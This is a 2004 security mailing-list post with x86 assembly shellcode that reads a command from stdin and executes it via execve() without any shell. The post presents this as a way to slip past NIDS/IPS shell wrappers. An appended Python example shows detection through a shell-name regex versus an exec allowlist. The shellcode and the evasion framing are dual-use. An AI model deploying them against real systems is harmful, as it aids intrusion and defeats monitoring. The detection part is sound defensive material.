Message-ID: <20040709190146.18913.qmail@web52302.mail.yahoo.com>
From: mar_fallon at yahoo.com.br (Martin Fallon)
Subject: No shell => secure?
Hello, sirs!
We don't need a shell. A shellcode uses system calls,
and the shellcode can be the shell.
See the following code:
-------------- noshell.s --------------
# Assembly example that simulates a shell.
# Without using any shell, it is the shell. :)
# Nash Leon - nashleon@...oo.com.br
#
# Note: it only takes a filename of 7 bytes.
_start:
#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80
#execve(buffer)
pushl %ecx
popl %esi
movl %esi,0x8(%esi)
movb $0x0,0x7(%esi)
movl $0x0,0xc(%esi)
movl $0xb,%eax
movl %esi,%ebx
leal 0x8(%esi),%ecx
#leal 0xc(%esi),%edx
movl $0x0, %edx
int $0x80
#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------
This source uses read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that it is possible to create
a shellcode that executes commands without
using a shell (/bin/bash, sh, zsh, tcsh, etc.).
It is useful when a NIDS/IPS interacts with
a shell wrapper, waiting for a string in the
interface, capturing an attack.
In this sample, only 7 bytes are permitted
as the path of the file to execute:
$ as -o noshell.o noshell.s
$ ld -o noshell noshell.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074
$ ./noshell
/bin/ls
noshell noshell.o noshell.s
So, sirs, a shell is not necessary to exploit
a system. NIDS/IPS can use a wrapper on the system
call execve() for security, but it is still possible
to break this resource.
Sorry for my poor English.
Best Regards,
Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/
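
Seen from the detection side, the message's point is that a rule keyed on shell names never fires when the payload calls execve() on another program such as /bin/ls. The following is an added example, not part of the original post: it compares a shell-name rule with a per-service exec allowlist over constructed, simplified exec-event records. The record format, service names, pids and allowlist policy are all assumptions made for illustration.

```python
import re

# Constructed, simplified exec-event records (hypothetical format, not a real
# audit log): one line per execve() call, with the calling service and target.
SAMPLE_EVENTS = """\
service=httpd pid=4101 exec=/usr/sbin/rotatelogs
service=httpd pid=4102 exec=/bin/sh
service=httpd pid=4103 exec=/bin/ls
service=sshd pid=4200 exec=/bin/bash
"""

# Shell-name rule: matches paths ending in sh, bash, zsh, tcsh, csh or ksh.
SHELL_NAMES = re.compile(r"/(?:ba|z|tc|c|k)?sh$")

# Assumed policy: programs each network-facing service may legitimately exec.
ALLOWED_EXEC = {
    "httpd": {"/usr/sbin/rotatelogs"},
    "sshd": {"/bin/bash", "/bin/sh"},
}


def load(text):
    """Parse 'key=value key=value' lines into a list of dicts."""
    return [dict(field.split("=", 1) for field in line.split())
            for line in text.splitlines() if line.strip()]


def shell_signature_alerts(events):
    """Naive rule: alert only when the exec target looks like a shell."""
    return [e for e in events if SHELL_NAMES.search(e["exec"])]


def allowlist_alerts(events):
    """Alert on any exec target the calling service is not expected to run."""
    return [e for e in events
            if e["exec"] not in ALLOWED_EXEC.get(e["service"], set())]


if __name__ == "__main__":
    events = load(SAMPLE_EVENTS)
    for name, rule in (("shell-name rule", shell_signature_alerts),
                       ("exec allowlist", allowlist_alerts)):
        hits = [f'{e["service"]}:{e["exec"]}' for e in rule(events)]
        print(f"{name}: {hits}")
```

The shell-name rule misses the httpd exec of /bin/ls and also flags the legitimate sshd login shell, while the allowlist flags both unexpected httpd executions. As the message notes, a check at execve() can itself be bypassed, so this is one detection layer rather than a guarantee.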